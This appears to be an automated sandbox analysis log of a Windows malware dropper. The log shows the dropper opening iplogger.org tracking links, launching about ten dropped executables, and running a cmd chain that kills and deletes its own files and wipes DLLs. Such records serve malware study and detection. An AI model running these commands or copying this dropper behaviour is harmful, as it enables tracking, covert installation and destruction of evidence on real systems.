Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1764,i,5049003172737788079,9933990258690121853,131072 /prefetch:8
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1824,i,1988256029535633376,615853278931345674,131072 /prefetch:8
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1828 --field-trial-handle=1808,i,2619368305235177812,9685674490899924791,131072 /prefetch:8
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\F0geI.exe "C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1772 --field-trial-handle=1808,i,12731814554735541846,5595601299034578970,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7024 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1816,i,10953678208131355352,362896463253549175,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1812,i,7141586697906360246,11009401238799386770,131072 /prefetch:8
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1768,i,9353750905984569281,2492682509794733046,131072 /prefetch:8
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\real.exe "C:\Program Files (x86)\Company\NewProduct\real.exe"
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\safert44.exe "C:\Program Files (x86)\Company\NewProduct\safert44.exe"
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\jshainx.exe "C:\Program Files (x86)\Company\NewProduct\jshainx.exe"
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\brokerius.exe "C:\Program Files (x86)\Company\NewProduct\brokerius.exe"
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\captain09876.exe "C:\Program Files (x86)\Company\NewProduct\captain09876.exe"
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe"
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\me.exe "C:\Program Files (x86)\Company\NewProduct\me.exe"
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im real.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\real.exe" & del C:\PrograData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im real.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6372 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6468 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8
Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6536 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6528 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im brokerius.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" & del C:\PrograData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im brokerius.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\F0geI.exe "C:\Program Files (x86)\Company\NewProduct\F0geI.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\real.exe "C:\Program Files (x86)\Company\NewProduct\real.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\safert44.exe "C:\Program Files (x86)\Company\NewProduct\safert44.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\jshainx.exe "C:\Program Files (x86)\Company\NewProduct\jshainx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\brokerius.exe "C:\Program Files (x86)\Company\NewProduct\brokerius.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\captain09876.exe "C:\Program Files (x86)\Company\NewProduct\captain09876.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files (x86)\Company\NewProduct\me.exe "C:\Program Files (x86)\Company\NewProduct\me.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1764,i,5049003172737788079,9933990258690121853,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7024 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1764,i,5049003172737788079,9933990258690121853,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6372 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6468 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6536 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6528 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1824,i,1988256029535633376,615853278931345674,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1828 --field-trial-handle=1808,i,2619368305235177812,9685674490899924791,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1772 --field-trial-handle=1808,i,12731814554735541846,5595601299034578970,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1816,i,10953678208131355352,362896463253549175,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1768,i,9353750905984569281,2492682509794733046,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1812,i,7141586697906360246,11009401238799386770,131072 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im real.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\real.exe" & del C:\PrograData\*.dll & exit
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im brokerius.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" & del C:\PrograData\*.dll & exit
Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im real.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im brokerius.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6

Source: C:\Users\user\Desktop\9n6ctoq7cn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "real.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brokerius.exe")

Source: C:\Users\user\Desktop\9n6ctoq7cn.exe

File created: C:\Users\user\AppData\Local\Temp\$inst

Jump to behavior

Source: real.exe, 00000017.00000002.552952674.00000000270FD000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.568377995.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.685831619.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.671019901.000000002774C000.00000004.00000800.00020000.00000000.sdmp, me.exe, 0000001D.00000002.742790849.000000006096F000.00000002.00000001.00020000.00000000.sdmp, me.exe, 0000001D.00000002.727644936.0000000026EC5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: real.exe, 00000017.00000002.552952674.00000000270FD000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.568377995.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.685831619.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.671019901.000000002774C000.00000004.00000800.00020000.00000000.sdmp, me.exe, 0000001D.00000002.742790849.000000006096F000.00000002.00000001.00020000.00000000.sdmp, me.exe, 0000001D.00000002.727644936.0000000026EC5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: real.exe, 00000017.00000002.552952674.00000000270FD000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.568377995.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.685831619.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.671019901.000000002774C000.00000004.00000800.00020000.00000000.sdmp, me.exe, 0000001D.00000002.742790849.000000006096F000.00000002.00000001.00020000.00000000.sdmp, me.exe, 0000001D.00000002.727644936.0000000026EC5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: real.exe, 00000017.00000002.552952674.00000000270FD000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.568377995.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.685831619.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.671019901.000000002774C000.00000004.00000800.00020000.00000000.sdmp, me.exe, 0000001D.00000002.742790849.000000006096F000.00000002.00000001.00020000.00000000.sdmp, me.exe, 0000001D.00000002.727644936.0000000026EC5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
